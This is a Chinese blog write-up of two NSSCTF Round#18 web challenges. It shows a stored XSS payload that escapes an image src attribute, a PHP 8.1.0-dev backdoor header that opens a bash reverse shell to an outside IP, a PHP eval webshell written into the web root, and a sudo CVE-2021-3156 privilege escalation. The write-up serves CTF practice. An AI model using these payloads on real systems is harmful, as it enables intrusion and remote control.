【Web】NSSCTF Round#18 Basic个人wp(部分)

已于 2024-02-17 11:14:43 修改
阅读量1.5k 收藏 11
点赞数 18
文章标签: nssctf NSSCTF Round#18 ctf web xss wp web安全
于 2024-02-14 17:30:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/136113548
版权

目录

①门酱想玩什么呢?

②Becomeroot

①门酱想玩什么呢?

先试一下随便给个链接

不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可

我们研究下评论区

从评论区知道,要让门酱玩元梦之星,考虑直接

<script>document.location="https://ymzx.qq.com/";</script>

尝试传了发现不能起作用跳转,估计是<>这些被html实体化了

那咋整呢,题目里还提供了评论插入图片功能

我们就按示例传一下(必须以http://开头,否则不能解析为图片)

 

链接是插入到了src中,我们可以直接用">闭合img标签

评论传

http://"><script>document.location="https://ymzx.qq.com/";</script>.png 123 /png

 成功重定向到元梦之星官网

bp抓包

获得该条恶意评论链接

http://node1.anna.nssctf.cn:28834/words/?title=MQ%3D%3D&content=aHR0cCUzQSUyRiUyRiUyMiUzRSUzQ3NjcmlwdCUzRWRvY3VtZW50LmxvY2F0aW9uJTNEJTIyaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyRiUyMiUzQiUzQyUyRnNjcmlwdCUzRS5wbmclMjAxMjMlMjAlMkZwbmc%3D

把这个链接给门酱即可获得flag

②Becomeroot

进来直接告诉我们php版本是8.1.0-dev

PHP-8.1.0-dev 后门命令执行漏洞复现_php/8.1.0-dev-CSDN博客

User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'");

直接反弹shell,发现要提权

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令

脚本不太好整到靶机上,还是写马连webshell方便点

User-Agentt: zerodiumsystem("echo '<?php eval(\$_POST[1])?>'>/var/www/html/1.php");

尝试用suid提权插件来整,失败

发现题目提示:

看一下sudo版本

 

不难找到对应CVE

CVE-2021-3156 sudo权限提升漏洞

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令 脚本传到服务器的/tmp目录下

 

进行提权,直接rce

Z3r4y
关注
  • 18
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Codeforces Round #723 (Div. 2).md
10-13
Codeforces Round #723 (Div. 2).md
Codeforces Round #627 (Div. 3) B. Yet Another Palindrome Problem
01-03
传送门 题意: 一个长度为n的数组,为删除一些数后,剩下的数能否构成长度大于3的回文数组 思路: 只要能找到两个相等的数,且他们的间距大于2即可 o(n^2)的暴力就能过 比赛时写了一个o(n)的 就是把所有相等的数放到一个vector里,如果他出现大于2次,看最远的间距是否大于2即可,找到一个就可以 代码: #include #include #include #include #include #include #include #include #include #include #define pb push_back #define lb lower_bound #define
Codeforces Round #628 (Div. 2)
01-03
C. Ehab and Path-etic MEXs 题意 给两两节点放一个数字(0~n-2 唯一) 给你一棵树,求所有任意两节点相连的路以外的路上的数字的最小值最小 思路 构造 若一个点连了三条边及以上,则这个点的边从最小值开始赋值。其他边从最大点开始赋值。 证明:一个点连了三条边及以上,那么任取uv所在路一定不可能经过该点的所有边,那么显然最大值为这个点所连边的第三小值2。 代码 #include using namespace std; typedef long long ll; typedef pairP; const double eps = 1e-8; const int NINF
Codeforces Round #479 (Div. 3) E. Cyclic Components
01-03
E. Cyclic Components 题目链接-E. Cyclic Components 题目大意 给你nnn个点和mmm条边,求所构成图中单圈环的个数 解题思路 并查集并查集并查集 很明显单圈环每个点的度都为222,所以我们可以用数组cnt[]记录每个点的度,只需要找度为222的点即可 如果一条边两个顶点的度都为222,我们可以用并查集判断两点是否在一个子图里 用并查集判断两个点父节点是否相同,如果父节点相同,就说明找到了环,ans++记录答案,否则就合并 具体操作见代码 附上代码 #pragma GCC optimize(-Ofast,-funroll-all-loops
WebNSSCTF Round#17 Basic个人wp(全)
uuzeray的博客
01-28 1363
题目作为小练手还行,具体细节不必较劲。
NSSCTF Round#18 Basic——过年来下棋
ASD830的博客
02-14 722
我都摆好咯~ 祝愿大家在新的一年里 lucky!flag格式:NSSCTF{**字母小写**}题目给出一串密文,根据题目猜测棋盘密码解密(key为“lucky”)
Codeforces Round #627 (Div. 3) C. Frog Jumps(思维)
01-20
传送门 题意: 开始位置在0,问能否跳到n+1位置 每步只能跳d 在1——n每个位置有方向,L,R,求d的最小值 思路: 只用找相邻两个R之间的最大值即可 代码: #include #include ...typedef long long l
Ansible的安装与配置
邢宇宇的博客
05-10 773
--tasks:#也可以将多个变量放在一个文件中---tasks:var5.yml此方式定义的是私有变量,即只能在当前playbook中使用,不能被其它Playbook共用---vars:tasks:范例:变量的相互调用---vars:tasks:#执行结果范例: 变量的相互调用---vars:tasks:1.所有项目的主机变量在inventory 主机清单文件中为指定的主机定义变量以便于在playbook中使用2.所有项目的组(公共)变量。
[NSSRound#18 Basic]web解析
rev1ve的博客
03-15 564
也就是说需要门酱自己网站的链接去跳转,由于我们通过xss语句已经插入到img的src中实现跳转到元梦之星。按照提示和php开发仓库入侵有关,搜出来刚好是对应题目php版本,可以利用。我们要跳转到元梦之星用到location去跳转,最基础的payload。点开评论区不难发现应该是想玩元梦之星,这里有个评论功能可以上传图片。所以我们只需要抓包跳转时的界面,就可以得到门酱跳转时的请求参数值。nc连接的靶机上传脚本比较麻烦,所以我们写马利用蚁剑上传。打开题目提示在/root里面,应该是最后要提权。
ORACLE 11g进程
数据之路-忆梦前程
08-26 1154
Name Expanded Name Short Description Long Description External Properties ABMR Auto BMR Background Process Coordinates execution of tasks such as filtering duplicate block med
2023-11-16 第十一周
weixin_48636572的博客
11-22 62
● 一个 playbook(剧本)文件是一个YAML语言编写的文本文件● 通常一个playbook只包括一个play● 一个 play的主要包括两部分: 主机和tasks. 即实现在指定一组主机上执行一个tasks定义好的任务列表。● 一个tasks中可以有一个或多个task任务● 每一个Task本质上就是调用ansible的一个module● 在复杂场景中,一个playbook中也可以包括多个play,实现对多组不同的主机执行不同的任务。
部署Ansible
ZJunWhite的博客
10-20 476
部署Ansible
csrf与xss差别 别在弄乱了 直接靶场实操pikachu的csrf题 token绕过可以吗???
helloKittywz的博客
06-09 1353
我们现在来说说这2个之间的关系,因为昨天的我也没有弄清楚这2者的关系,总感觉迷迷糊糊的。xss这个漏洞是大家并不怎么陌生,导致xss漏洞的产生是服务器没有对用户提交数据过滤不严格,导致浏览器把用户输入的当作js代码返回客户端进行执行,这样就导致了攻击。xss(跨站脚本攻击)可以说简单一点前端js代码可以干什么我们就可以干什么,我们可以获取到用户的cookie,获取键盘记录,钓鱼等等的操作我们来说说csrf这个漏洞csrf(跨站请求伪造)这个是利用用户的。
Strict-Transport-Security(HSTS)& X-Frame-Options & X-XSS-Protection
weixin_42451330的博客
06-12 370
本文对Strict-Transport-Security(HSTS)& X-Frame-Options & X-XSS-Protection 进行了介绍,列举了常用指令及示例。
XSS(跨站脚本攻击)
guowu666的博客
06-10 1295
xss基础
国内外网络安全现状分析
waitaikong_的博客
06-10 430
综上所述,无论是国内还是国际层面,网络安全都是一个复杂且不断演变的领域。面对日益严峻的网络安全威胁,需要政府、企业和个人共同努力,不断提升技术防护能力,加强法律法规建设,并通过国际合作共同应对挑战。同时,加强网络安全教育和人才培养也是保障网络安全的重要环节。在未来,随着技术的不断进步和国际合作的加深,我们有理由相信网络安全状况将会得到进一步的改善。
网络安全管理组织架构复习
LongL_GuYu的博客
06-12 318
网络安全管理组织架构复习
网络安全练气篇——OWASP TOP 10
weixin_55762309的博客
06-13 506
OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。
网络安全 - ARP 欺骗原理+实验
最新发布
z339521的博客
06-13 1034
APRAPR(Address Resolution Protocol)即地址解析协议,负责将某个 IP 地址解析成对应的 MAC 地址。在网络通信过程中会使用到这两种地址,逻辑 IP 地址和物理 MAC 地址,一般情况下,正常通信需要这两种地址协同工作。一个主机要和另一个主机进行直接通信,必须要知道目标主机的 MAC 地址。但这个目标 MAC 地址是如何获得的呢?就是需要通过 ARP 协议获得的。
codeforces round #729
03-16
Codeforces Round #729 是 Codeforces 的一个比赛,于2021年8月29日举行。这是一个由 Codeforces 组织的在线编程竞赛,参赛者需要在规定时间内解决一系列算法问题。比赛难度分为 A、B、C、D、E、F 六个等级,参赛者需要根据自己的实力选择适合自己的难度等级进行挑战。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值